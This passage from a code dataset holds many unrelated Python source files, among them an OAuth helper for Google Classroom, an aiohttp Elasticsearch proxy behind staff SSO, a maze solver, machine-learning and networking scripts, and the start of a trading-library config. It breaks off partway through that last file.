= None, members = None, price = None, highAlch = None, buyLimit = None, noteable = None, tradeable_on_ge = None, stackable = None, timestamp = None):\n self.id = id\n self.name = name\n self.members = members\n self.price = price\n self.highAlch = highAlch\n self.buyLimit = buyLimit\n self.noteable = noteable\n self.tradeable_on_ge = tradeable_on_ge\n self.stackable = stackable\n self.timestamp = timestamp\n\n def __str__(self):\n return str(self.name) + \" \" + str(self.tradeable_on_ge)","sub_path":"GEItem.py","file_name":"GEItem.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"137033808","text":"# https://developers.google.com/classroom/quickstart/python\n# pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\n\n\n# inputs: none\n# output: service object for Google classroom\ndef generate_classroom_credential():\n import pickle\n import os.path\n from googleapiclient.discovery import build\n from google_auth_oauthlib.flow import InstalledAppFlow\n from google.auth.transport.requests import Request\n import httplib2\n\n scopes = ['https://www.googleapis.com/auth/classroom.announcements',\n 'https://www.googleapis.com/auth/classroom.courses',\n 'https://www.googleapis.com/auth/classroom.coursework.students',\n 'https://www.googleapis.com/auth/classroom.rosters',\n 'https://www.googleapis.com/auth/classroom.topics',\n 'https://www.googleapis.com/auth/classroom.courseworkmaterials',\n 'https://www.googleapis.com/auth/classroom.profile.emails',\n 'https://www.googleapis.com/auth/classroom.guardianlinks.students.readonly',\n ]\n\n\n creds = None\n # The file token_classroom.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token_classroom.pickle'):\n with open('token_classroom.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('credentials_classroom.json', scopes)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open('token_classroom.pickle', 'wb') as token:\n pickle.dump(creds, token)\n try:\n service = build('classroom', 'v1', credentials=creds)\n except httplib2.ServerNotFoundError:\n raise Exception(\"Could not reach Google's servers to create a Google CLASSROOM service object. Internet down?\"\n \"Google down? Your DNS not working?\")\n print(\"Google classroom service object generated\")\n return service\n\n","sub_path":"generate_classroom_credential.py","file_name":"generate_classroom_credential.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"122548732","text":"from ..views import (JudgeListView, JudgeCreateView, \n JudgeUpdateView, JudgeDeleteView, JudgeDeleteAllView)\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import re_path\n\nurlpatterns = [\n re_path(r'^create/(?P\\d+)/$',\n login_required(JudgeCreateView.as_view()),\n name=\"judge_create\"),\n\n re_path(r'^(?P\\d+)/update/$',\n login_required(JudgeUpdateView.as_view()),\n name=\"judge_update\"),\n\n re_path(r'^(?P\\d+)/delete/$',\n login_required(JudgeDeleteView.as_view()),\n name=\"judge_delete\"),\n \n re_path(r'^delete/$',\n login_required(JudgeDeleteAllView.as_view()),\n name=\"judge_delete_all\"),\n\n re_path(r'^$',\n JudgeListView.as_view(),\n name=\"judge_list\"),\n]\n","sub_path":"core/urls/judge_urls.py","file_name":"judge_urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"57326646","text":"import numpy as np\nfrom pylab import *\nimport myrandom\n\n\n\n\ntlen = 100\ndt = 0.1\nxmean = 50.0\nxvar = 3\nxsd = np.sqrt(xvar)\n\nt = np.arange(0,tlen+dt,dt)\n\n\nn = t.shape[0]\nx = myrandom.normdis( n,xmean, xsd )\n\nplot(t,x)\n\n\nvarxnew = np.var(x)\nmeanxnew = np.mean(x)\n\nfracvar = varxnew / (meanxnew*meanxnew)\nfracsd = np.sqrt(fracvar)\n\n\nshow()","sub_path":"pythontests/testfracvar.py","file_name":"testfracvar.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"27193355","text":"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom datetime import datetime\nfrom sklearn.model_selection import train_test_split\n\n\ndf = pd.read_csv('attrition_train.csv', index_col=0)\nprint(df.head(1))\n\n# Vidimo da se skup podataka sastoji od 35 atributa, sa ciljnom varijablom Attrition.\n# Potrebno je prvo popuniti null vrijednosti u skupu podataka...\n\ncategorical_cols = ['Department', 'EducationField', 'Gender', 'JobRole', 'MaritalStatus', 'OverTime', 'Over18', 'BusinessTravel', 'Education', 'EnvironmentSatisfaction', 'JobInvolvement', 'JobLevel', 'JobSatisfaction', 'PerformanceRating', 'RelationshipSatisfaction', 'StockOptionLevel', 'WorkLifeBalance', 'Attrition']\ndf = df.fillna(df.mode().iloc[0])\n\n# Sve null vrijednosti u kategorickim kolonama popunjavamo sa najcescom vrijednoscu u toj koloni\n\nnumerical_cols = ['DailyRate', 'DistanceFromHome', 'EmployeeCount', 'EmployeeNumber', 'HourlyRate', 'MonthlyIncome', 'MonthlyRate', 'NumCompaniesWorked', 'PercentSalaryHike', 'StandardHours','TotalWorkingYears', 'TrainingTimesLastYear', 'YearsAtCompany', 'YearsInCurrentRole', 'YearsSinceLastPromotion', 'YearsWithCurrManager']\ndf = df.fillna(df.mean().iloc[0])\n\n# onehot encoding\nto_onehot_encode_cols = ['Department', 'EducationField', 'Gender', 'JobRole', 'MaritalStatus', 'OverTime', 'Over18']\ndf = pd.get_dummies(df, columns=to_onehot_encode_cols)\n\n# zadnju kolonu birthdate pretvaramo u broj godina starosti:\ndf['Age'] = df['BirthDate'].map(lambda x: abs((datetime.now() - datetime.strptime(x, '%Y-%m-%d')).days) / 365)\ndf = df.drop('BirthDate', axis=1)\n\nto_encode_cols = {\n 'BusinessTravel': ['Non-Travel', 'Travel_Frequently', 'Travel_Rarely'],\n 'Education': ['1', '2', '3', 'Master', 'Doctor'],\n 'EnvironmentSatisfaction': ['1', 'Medium', '3', '4'],\n 'JobInvolvement': ['1', '2', 'High', '4'],\n 'JobLevel': ['One', '2', '3', '4', 'Five'],\n 'JobSatisfaction': ['1', '2', '3', 'Very High'],\n 'PerformanceRating': ['Excellent', 'Outstanding'],\n 'RelationshipSatisfaction': ['Low', '2', 'High', '4'],\n 'StockOptionLevel': ['Zero', '1', '2', '3'],\n 'WorkLifeBalance': ['Bad', 'Good', 'Better', 'Best'],\n 'Attrition': ['No', 'Yes']\n}\n\nfor feature, vals in to_encode_cols.items():\n df[feature] = df[feature].map(lambda x: vals.index(x))\n\n# Potrebno je odvojiti ciljni atribut Attrition od ostatka skupa\nX = df.drop('Attrition', axis=1)\ny = df['Attrition']\n\n# Nakon popunjenih nedostajucih vrijednosti mozemo preci na treneiranje modela\n\nstablo = DecisionTreeClassifier()\nrandom_forest = RandomForestClassifier()\ngbm = GradientBoostingClassifier()\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25)\n\nstablo.fit(X_train, y_train)\nrandom_forest.fit(X_train, y_train)\ngbm.fit(X_train, y_train)\n\nprint(f'Tacnost stabla holdout metodom: {stablo.score(X_test, y_test)}')\nprint(f'Tacnost random foresta holdout metodom: {random_forest.score(X_test, y_test)}')\nprint(f'Tacnost boosted foresta holdout metodom: {gbm.score(X_test, y_test)}')\n\n# # Vidimo da boosted forest daje najbolju tacnost ~ 85%\n\n# Interval puzdanosti je procjena koja nam govori da ce uzorak koji je izabran iz populacije upasti u interval populacije tj. na osnovnu zadatih parametara populacije poput srednje vrijednosti ili varijance \n# nastojimo da odredimo u kojem intervalu srednja vrijednost uzorka lezi u uzorku populacije.\n# P-vrijednost je vjerovatnoća koja određuje povrsinu desno od neke tačke kod normalne distribucije. \n# Pos predict value je vjerovatnoća da će slučajno odabrani uzorak biti ispravno pozitivno klasificiran.\n# Prevalence je količina loših predikcija klasifikacije u cijeloj populaciji.\n# Detection rate je omjer pozitivnih instanci koji su tačno klasificirane u odnosu na svim pozitivnim unutar populacije.\n# Detection prevalence je broj prediktanih pozitivnih uzoraka u odnosu na cijelu populaciju.\n# Balanced accuracy je srednja vrijednost tačnosti za svaku klasu klasifikacije pojedinačno.\n\n","sub_path":"z1.py","file_name":"z1.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503137350","text":"import time\n\nDESIRED_SAMPLES = 200\nACCEPTED_DIFFERENCE = 1.5\nTIME_TO_START = 20\n\nclass Calibrator():\n def __init__(self):\n self._start_time = time.time()\n self._axes_sums = [None]*3\n self._samples = 0\n\n def add_sample(self, sample_data, current_time):\n if self.ready():\n return True\n\n time_elapsed = current_time - self._start_time\n if time_elapsed < TIME_TO_START:\n return False\n\n if self._axes_sums[0] is None:\n self._axes_sums = [*sample_data]\n self._samples = 1\n else:\n accepted_sample = True\n for i in range(0, len(self._axes_sums)):\n average = self._axes_sums[i] / self._samples\n difference = abs(average - sample_data[i])\n if difference > ACCEPTED_DIFFERENCE:\n accepted_sample = False\n break\n\n if accepted_sample is True:\n for i in range(0, len(self._axes_sums)):\n self._axes_sums[i] += sample_data[i]\n self._samples += 1\n else:\n self._axes_sums = [*sample_data]\n self._samples = 1\n\n return self.ready()\n\n def ready(self):\n return self._samples >= DESIRED_SAMPLES\n\n def averages(self):\n results = []\n for i in range(0, len(self._axes_sums)):\n results.append(self._axes_sums[i] / self._samples)\n return results\n\n def clear(self):\n self._start_time = time.time()\n self._axes_sums = [None]*3\n self._samples = 0\n","sub_path":"src/system/calibrator.py","file_name":"calibrator.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"520129620","text":"\"\"\"Utilities shared between csrn modules and tf modified ops.\"\"\"\n\nimport json\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.framework import ops\n\n\ndef import_json_config(config_path):\n \"\"\"Import json configurations.\n \n Args:\n config_path: Absolute path to configuration .json file.\n \n Returns:\n A configuration dictionary.\n\n Raises:\n NameError: If the file does not exist.\n \n \"\"\"\n try:\n with open(config_path) as config_json:\n config = json.load(config_json)\n config_json.close()\n return config\n except NameError as ex:\n print(\"Read Error: no file named %s\" % config_path)\n raise ex\n\n\ndef comp_shard(self, num_shards, index):\n \"\"\"Creates a `Dataset` that includes (`num_shards`-1)/`num_shards` of this dataset.\n Complementary to 'shard' method of tf.data.Dataset.\n Useful when seperating an evaluation dataset from the overall set.\n Should be assigned to the Dataset class like that:\n \n ```python\n import tensorflow as tf\n tf.data.Dataset.comp_shards = comp_shard\n ```\n\n Use Example:\n\n ```python\n # d is a dataset containing all samples.\n d = d.shuffle(FLAGS.shuffle_buffer_size)\n d = d.repeat(FLAGS.num_epochs)\n train_dataset = d.shard(10, 0);\n eval_dataset = d.comp_shard(10, 0);\n ```\n\n Args:\n num_shards: A `tf.int64` scalar `tf.Tensor`.\n index: A `tf.int64` scalar `tf.Tensor`. Use the same index given to 'shard'\n operation to recieve the correct complementary dataset.\n Returns:\n Dataset: A `Dataset`.\n Raises:\n ValueError: if `num_shards` or `index` are illegal values. Note: error\n checking is done on a best-effort basis, and aren't guaranteed to be\n caught upon dataset creation. (e.g. providing in a placeholder tensor\n bypasses the early checking, and will instead result in an error during\n a session.run call.)\n \n \"\"\"\n num_shards = ops.convert_to_tensor(\n num_shards, name=\"num_shards\", dtype=dtypes.int64)\n num_shards_static = tensor_util.constant_value(num_shards)\n index = ops.convert_to_tensor(index, name=\"index\", dtype=dtypes.int64)\n index_static = tensor_util.constant_value(index)\n\n if num_shards_static is not None and num_shards_static < 1:\n raise ValueError(\"num_shards must be >= 1; got: %s\" % num_shards_static)\n if index_static is not None and index_static < 0:\n raise ValueError(\"index must be >= 0; got: %s\" % index_static)\n if (index_static is not None and num_shards_static is not None and\n index_static >= num_shards_static):\n raise ValueError(\"index must be <= num_shards; %s is not < %s\" %\n (index_static, num_shards_static))\n\n def filter_fn(elem_index, _):\n mod_result = math_ops.mod(elem_index, num_shards)\n return math_ops.not_equal(mod_result, index)\n\n return self._enumerate().filter(filter_fn).map(lambda _, elem: elem)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"474317199","text":"\"\"\"\nThis Python script evaluates the total time taken to execute \"show version\" on 4 network devices:\n- 1 Cisco IOS device\n- 2 Arista EOS devices\n- 1 Juniper SRX device\n\nIt uses Netmiko & the \"ThreadPoolExecutor\" in Concurrent Futures\n\"\"\"\n\nfrom concurrent.futures import ThreadPoolExecutor, as_completed # no longer importing wait timer\nfrom datetime import datetime\nfrom my_devices import device_list\nfrom my_functions import ssh_command2 as ssh_conn\n\n\ndef main():\n command = \"show version\"\n start_time = datetime.now()\n max_threads = 4\n \n pool = ThreadPoolExecutor(max_threads)\n \n future_list = []\n for device in device_list:\n future = pool.submit(ssh_conn, device, command)\n future_list.append(future)\n\n # Process as completed, whichever result is the fastest\n for future in as_completed(future_list):\n print(\"#\" * 30)\n print(\"Result: \" + future.result())\n end_time = datetime.now()\n print(f\"\\nExecution time for result: {end_time - start_time}\")\n\n end_time = datetime.now()\n print(f\"\\nTotal execution time: {end_time - start_time}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ssh_concurrency/ex3b.py","file_name":"ex3b.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"385434757","text":"from collections import deque\nimport queue\n\nclass MyQueue:\n\n def __init__(self):\n self.front = []\n self.rear = []\n\n def push(self, x: int) -> None:\n self.front.append(x)\n\n def pop(self) -> int:\n if len(self.front)==1:\n return self.front.pop()\n else:\n while len(self.front)>1:\n self.rear.append(self.front.pop())\n return self.front.pop()\n\n def peek(self) -> int:\n if len(self.front)==1:\n return self.front[len(self.front)-1]\n else:\n return self.rear[len(self.rear)-1]\n\n def empty(self) -> bool:\n return len(self.front)<1\ndef longestValidParentheses( s: str) -> int:\n stack = deque()\n current=0;maxValid=0\n for e in s:\n if e == '(':\n stack.append('(')\n elif e == ')':\n if stack:\n ch = stack.pop()\n if ch == '(':\n current+=2\n if maxValid<=current:\n maxValid=current\n\n else:\n stack.append('(')\n else:\n current=0\n return maxValid\n\ndef myQueue():\n c = queue.Queue()\n c.put(\"first\",block=True,timeout=0.5)\n c.put(\"second\")\n print(c.get())\n print(c.get())\n print(c.empty())\n \n print(c.get(timeout=1))\n a = deque()\n a.append(1)\n a.append(2)\n print(a.pop())\n print(a.pop())\n print(a.pop())\n\ndef balancedBrackets(string):\n # Write your code here.\n stack = []\n balanced = False\n top = None\n for e in string:\n symbols = ['(','[','{']\n closing = [')',']','}']\n if e in symbols:\n stack.append(e)\n else:\n if len(stack)==0:\n balanced = False\n elif e in closing:\n top = stack.pop()\n if not matches(top,e):\n return False\n else:\n balanced = True\n return balanced and len(stack)==0\n\ndef matches(first,second):\n return (first=='(' and second == ')') or (first == '[' and second == ']') or (first == '{' and second == '}')\n\ndef longestBalancedBrackets(s):\n n = len(s)\n stack = []\n count = 0;total=0\n balanced = True\n for e in s:\n if e == '(':\n stack.append('(')\n else:\n if len(stack)==0:\n\n balanced = False\n\n else:\n top = stack.pop()\n if top == '(':\n count+=2\n balanced = True\n if total int:\n l=r=c=0\n for i in range(len(s)):\n if s[i]=='(':\n l+=1\n else:\n r+=1\n if l==r:\n c=max(c,l+r)\n elif lr:\n l=r=0\n return c\ndef nextGreaterElement(array):\n # Write your code here.\n stack = []\n n = len(array)\n\n return []\nif __name__ == '__main__':\n\n s = \"(a)\"\n print(balancedBrackets(s))\n s1 = \")()()()(((((((()))\"\n print(longestValidParentheses(s1))\n print(longestBalancedBrackets(s1))\n sol = Solution()\n print(sol.longestValidParentheses(s1))\n","sub_path":"Algorithms/HundredDaysOfCode/StacksAndQueues.py","file_name":"StacksAndQueues.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"186803233","text":"import queue\n\nimport numpy\n\n\nclass HitError(ValueError):\n pass\n\n\nclass WallHitError(HitError):\n pass\n\n\nclass BorderHitError(HitError):\n pass\n\n\nIS_TARGET = 1\nWALL_LEFT = 2\nWALL_UP = 4\n\n\ndef up(maze, loc, check_walls=True):\n if loc[0] == 0:\n raise BorderHitError\n if check_walls and maze[loc] & WALL_UP:\n raise WallHitError\n return loc[0] - 1, loc[1]\n\n\ndef down(maze, loc, check_walls=True):\n if loc[0] == (maze.shape[0] - 1):\n raise BorderHitError\n newloc = loc[0] + 1, loc[1]\n if check_walls and maze[newloc] & WALL_UP:\n raise WallHitError\n return newloc\n\n\ndef left(maze, loc, check_walls=True):\n if loc[1] == 0:\n raise BorderHitError\n if check_walls and maze[loc] & WALL_LEFT:\n raise WallHitError\n return loc[0], loc[1] - 1\n\n\ndef right(maze, loc, check_walls=True):\n if loc[1] == (maze.shape[1] - 1):\n raise BorderHitError\n newloc = loc[0], loc[1] + 1\n if check_walls and maze[newloc] & WALL_LEFT:\n raise WallHitError\n return newloc\n\n\ndef ends(maze):\n return numpy.asarray(numpy.where(maze & IS_TARGET)).T\n\n\nDIRS = {\n b'^': up,\n b'<': left,\n b'>': right,\n b'v': down,\n}\n\nANTIDIRS = {\n down: b'^',\n right: b'<',\n left: b'>',\n up: b'v'\n}\n\nUNREACHABLE = b' '\nTARGET = b'X'\n\n\ndef arrows_to_path(arrows, loc):\n if arrows[loc] == UNREACHABLE:\n raise ValueError('Cannot construct path for unreachable cell')\n path = [loc]\n\n nloc = loc\n while arrows[nloc] != TARGET:\n nloc = DIRS[arrows[nloc]](arrows, nloc, check_walls=False)\n path.append(nloc)\n\n return path\n\n\ndef smallest_dtype(value):\n for dtype in numpy.int8, numpy.int16, numpy.int32, numpy.int64:\n if dtype(value) == value:\n return dtype\n raise ValueError(f'Maze of size {value} is too big for NumPy to handle')\n\n\ndef flood(maze):\n if maze.ndim != 2 or not numpy.issubdtype(maze.dtype, numpy.integer):\n raise TypeError('maze must be a 2-dimensional array of integers')\n\n # Initialize everything as unreachable\n dtype = smallest_dtype(maze.size)\n distances = numpy.full(maze.shape, -1, dtype=dtype)\n directions = numpy.full(maze.shape, UNREACHABLE, dtype=('a', 1))\n\n jobs = queue.Queue()\n for end in ends(maze):\n end = tuple(end)\n directions[end] = TARGET\n distances[end] = 0\n jobs.put((end, 1))\n\n while not jobs.empty():\n loc, dist = jobs.get()\n for walk in [up, left, right, down]:\n try:\n newloc = walk(maze, loc)\n except HitError:\n pass\n else:\n # Been there better\n if 0 <= distances[newloc] <= dist:\n continue\n distances[newloc] = dist\n directions[newloc] = ANTIDIRS[walk]\n jobs.put((newloc, dist+1))\n\n return distances, directions\n\n\ndef is_reachable(directions):\n return UNREACHABLE not in directions\n\n\nclass AnalyzedMaze:\n def __init__(self, maze):\n self.maze = maze\n self.distances, self.directions = flood(maze)\n self.is_reachable = is_reachable(self.directions)\n\n def path(self, column, row):\n return arrows_to_path(self.directions, (column, row))\n\n\ndef analyze(maze):\n return AnalyzedMaze(maze)\n","sub_path":"edgemaze/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"439275684","text":"import asyncio\nimport logging\nimport os\nimport secrets\nimport sys\nimport urllib\n\nimport aiohttp\nfrom aiohttp import web\nfrom aiohttp_session import (\n get_session,\n session_middleware,\n)\nfrom aiohttp_session.redis_storage import RedisStorage\nimport aioredis\n\nfrom shared.logger import (\n get_root_logger,\n logged,\n)\nfrom shared.utils import (\n aws_auth_headers,\n get_common_config,\n normalise_environment,\n)\nfrom shared.web import (\n server_logger,\n authenticate_by_ip,\n)\n\nINCORRECT = 'Incorrect authentication credentials.'\n\n\nasync def run_application():\n logger = get_root_logger('elasticsearch-proxy')\n\n with logged(logger, 'Examining environment', []):\n env = normalise_environment(os.environ)\n port = env['PORT']\n ip_whitelist = env['INCOMING_IP_WHITELIST']\n staff_sso_client_base = env['STAFF_SSO_BASE']\n staff_sso_client_id = env['STAFF_SSO_CLIENT_ID']\n staff_sso_client_secret = env['STAFF_SSO_CLIENT_SECRET']\n es_endpoint, redis_uri, _ = get_common_config(env)\n\n client_session = aiohttp.ClientSession(skip_auto_headers=['Accept-Encoding'])\n\n async def handle(request):\n url = request.url.with_scheme(es_endpoint['protocol']) \\\n .with_host(es_endpoint['host']) \\\n .with_port(int(es_endpoint['port']))\n request_body = await request.read()\n source_headers = {\n header: request.headers[header]\n for header in ['Kbn-Version', 'Content-Type']\n if header in request.headers\n }\n auth_headers = aws_auth_headers(\n 'es', es_endpoint, request.method, request.path,\n dict(request.query), source_headers, request_body,\n )\n\n with logged(\n request['logger'], 'Elasticsearch request by (%s)/(%s) to (%s) (%s) (%s)', [\n request['me_profile']['email'], es_endpoint['access_key_id'],\n request.method, str(url), request_body,\n ],\n ):\n async with client_session.request(\n request.method, str(url), data=request_body,\n headers={**source_headers, **auth_headers}\n ) as response:\n response_body = await response.read()\n\n return web.Response(status=response.status, body=response_body, headers=response.headers)\n\n redis_pool = await aioredis.create_pool(redis_uri)\n redis_storage = RedisStorage(redis_pool, max_age=60*60*24)\n\n with logged(logger, 'Creating listening web application', []):\n app = web.Application(middlewares=[\n server_logger(logger),\n authenticate_by_ip(INCORRECT, ip_whitelist),\n session_middleware(redis_storage),\n authenticate_by_staff_sso(client_session, staff_sso_client_base,\n staff_sso_client_id, staff_sso_client_secret),\n ])\n\n app.add_routes([\n web.delete(r'/{path:.*}', handle),\n web.get(r'/{path:.*}', handle),\n web.post(r'/{path:.*}', handle),\n web.put(r'/{path:.*}', handle),\n web.head(r'/{path:.*}', handle),\n ])\n\n class NullAccessLogger(aiohttp.abc.AbstractAccessLogger):\n # pylint: disable=too-few-public-methods\n\n def log(self, request, response, time):\n pass\n\n runner = web.AppRunner(app, access_log_class=NullAccessLogger)\n await runner.setup()\n site = web.TCPSite(runner, '0.0.0.0', port)\n await site.start()\n\n\ndef authenticate_by_staff_sso(client_session, base, client_id, client_secret):\n\n auth_path = '/o/authorize/'\n token_path = '/o/token/'\n me_path = '/api/v1/user/me/'\n grant_type = 'authorization_code'\n scope = 'read write'\n response_type = 'code'\n\n redirect_from_sso_path = '/__redirect_from_sso'\n session_token_key = 'staff_sso_access_token'\n\n def get_redirect_uri_authenticate(session, request):\n state = secrets.token_urlsafe(32)\n set_redirect_uri_final(session, state, request)\n redirect_uri_callback = urllib.parse.quote(get_redirect_uri_callback(request), safe='')\n return f'{base}{auth_path}?' \\\n f'scope={scope}&state={state}&' \\\n f'redirect_uri={redirect_uri_callback}&' \\\n f'response_type={response_type}&' \\\n f'client_id={client_id}'\n\n def get_redirect_uri_callback(request):\n uri = request.url.with_scheme(request.headers['X-Forwarded-Proto']) \\\n .with_path(redirect_from_sso_path) \\\n .with_query({})\n return str(uri)\n\n def set_redirect_uri_final(session, state, request):\n session[state] = str(request.url)\n\n def get_redirect_uri_final(session, request):\n state = request.query['state']\n return session[state]\n\n @web.middleware\n async def _authenticate_by_sso(request, handler):\n session = await get_session(request)\n\n if request.path != redirect_from_sso_path and session_token_key not in session:\n return web.Response(status=302, headers={\n 'Location': get_redirect_uri_authenticate(session, request),\n })\n\n if request.path == redirect_from_sso_path:\n code = request.query['code']\n redirect_uri_final = get_redirect_uri_final(session, request)\n sso_response = await client_session.post(\n f'{base}{token_path}',\n data={\n 'grant_type': grant_type,\n 'code': code,\n 'client_id': client_id,\n 'client_secret': client_secret,\n 'redirect_uri': get_redirect_uri_callback(request),\n },\n )\n session[session_token_key] = (await sso_response.json())['access_token']\n return web.Response(status=302, headers={'Location': redirect_uri_final})\n\n token = session[session_token_key]\n async with client_session.get(f'{base}{me_path}', headers={\n 'Authorization': f'Bearer {token}'\n }) as me_response:\n me_profile = await me_response.json()\n\n request['me_profile'] = me_profile\n return \\\n await handler(request) if me_response.status == 200 else \\\n web.Response(status=302, headers={\n 'Location': get_redirect_uri_authenticate(session, request),\n })\n\n return _authenticate_by_sso\n\n\ndef main():\n stdout_handler = logging.StreamHandler(sys.stdout)\n app_logger = logging.getLogger('activity-stream')\n app_logger.setLevel(logging.DEBUG)\n app_logger.addHandler(stdout_handler)\n\n loop = asyncio.get_event_loop()\n loop.create_task(run_application())\n loop.run_forever()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"elasticsearch_proxy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"550845788","text":"#!/usr/bin/env python3\nimport os\nfrom logging import Logger\n\nimport log\nimport requests\n\nDEFAULT_LOGGER: Logger = log.create_default_logger()\n\n\ndef main():\n logger = DEFAULT_LOGGER\n\n remote_url = os.sys.argv[1]\n local_file = os.sys.argv[2]\n\n logger.info(f\"Download {remote_url}\")\n\n responce = requests.get(remote_url)\n\n with open(local_file, \"wb\") as f:\n logger.info(f\"Save responce as {local_file}\")\n f.write(responce.content)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"roles/vscode/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"127956532","text":"from unittest import TestCase\n\nfrom tests import get_data\nfrom pytezos.operation.forge import forge_operation_group\n\n\nclass OperationForgingTestooFDEN(TestCase):\n\n def setUp(self):\n self.maxDiff = None\n \n def test_forge_ooFDEN(self):\n expected = get_data(\n path='operations/ooFDENTDXmm2TMUugi3B8J93tprk3qRJajD9Djw2ESamNuCbZod/forged.hex')\n actual = forge_operation_group(get_data(\n path='operations/ooFDENTDXmm2TMUugi3B8J93tprk3qRJajD9Djw2ESamNuCbZod/unsigned.json'))\n self.assertEqual(expected, actual)\n","sub_path":"tests/operations/ooFDENTDXmm2TMUugi3B8J93tprk3qRJajD9Djw2ESamNuCbZod/test_forge_ooFDEN.py","file_name":"test_forge_ooFDEN.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"372518749","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\nimport math\nimport cv2\nimport sys\n\n\n\ndef main():\n\timg=cv2.imread(sys.argv[1])\n\trows, cols, channels = img.shape\n\trow4=int(rows/2)\n\tcol4=int(cols/2)\n\tlabels=np.zeros((2,2))\n\n\tfor i in range(2):\n\t\tfor j in range(2):\n\t\t\tnew = img[i*row4:(i+1)*row4, j*col4:(j+1)*col4]\n\t\t\tcv2.imwrite(\"single\"+str(i)+str(j)+\".jpg\", new)\n\t\t\tlabel=str(i)+str(j)\n\t\t\tlabels[i][j]=label\n\n\tprint (labels)\n\nmain()","sub_path":"rmrc/scripts/cropper.py","file_name":"cropper.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"4695169","text":"# -*- encoding:utf-8 -*-\n\"\"\"\n 全局环境配置模块\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport re\nimport platform\nimport sys\nimport warnings\nfrom enum import Enum\nfrom os import path\n\nimport numpy as np\nimport pandas as pd\n\n__author__ = '阿布'\n__weixin__ = 'abu_quant'\n\n\"\"\"暂时支持windows和mac os,不是windows就是mac os(不使用Darwin做判断),linux下没有完整测试\"\"\"\ng_is_mac_os = platform.system().lower().find(\"windows\") < 0 and sys.platform != \"win32\"\n\"\"\"主进程pid,使用并行时由于ABuEnvProcess会拷贝主进程注册了的模块信息,所以可以用g_main_pid来判断是否在主进程\"\"\"\ng_main_pid = os.getpid()\ng_cpu_cnt = os.cpu_count()\n\"\"\"pandas忽略赋值警告\"\"\"\npd.options.mode.chained_assignment = None\n\"\"\"numpy,pandas显示控制,默认开启\"\"\"\ng_display_control = True\nif g_display_control:\n # pandas DataFrame表格最大显示行数\n pd.options.display.max_rows = 20\n # pandas DataFrame表格最大显示列数\n pd.options.display.max_columns = 20\n # pandas精度浮点数显示4位\n pd.options.display.precision = 4\n # numpy精度浮点数显示4位,不使用科学计数法\n np.set_printoptions(precision=4, suppress=True)\n\n\"\"\"忽略所有警告,默认关闭\"\"\"\ng_ignore_all_warnings = False\n\"\"\"忽略库警告,默认打开\"\"\"\ng_ignore_lib_warnings = True\nif g_ignore_lib_warnings:\n # noinspection PyBroadException\n try:\n import matplotlib\n\n matplotlib.warnings.filterwarnings('ignore')\n matplotlib.warnings.simplefilter('ignore')\n import sklearn\n\n sklearn.warnings.filterwarnings('ignore')\n sklearn.warnings.simplefilter('ignore')\n except:\n pass\nif g_ignore_all_warnings:\n warnings.filterwarnings('ignore')\n warnings.simplefilter('ignore')\n\n# ******************** 数据目录 start ****************\n\"\"\"\n abu 文件目录根目录\n windows应该使用磁盘空间比较充足的盘符,比如:d://, e:/, f:///\n\n eg:\n root_drive = 'd://'\n root_drive = 'e://'\n root_drive = 'f://'\n\"\"\"\nroot_drive = path.expanduser('~')\n\"\"\"abu数据缓存主目录文件夹\"\"\"\ng_project_root = path.join(root_drive, 'abu')\n\"\"\"abu数据文件夹 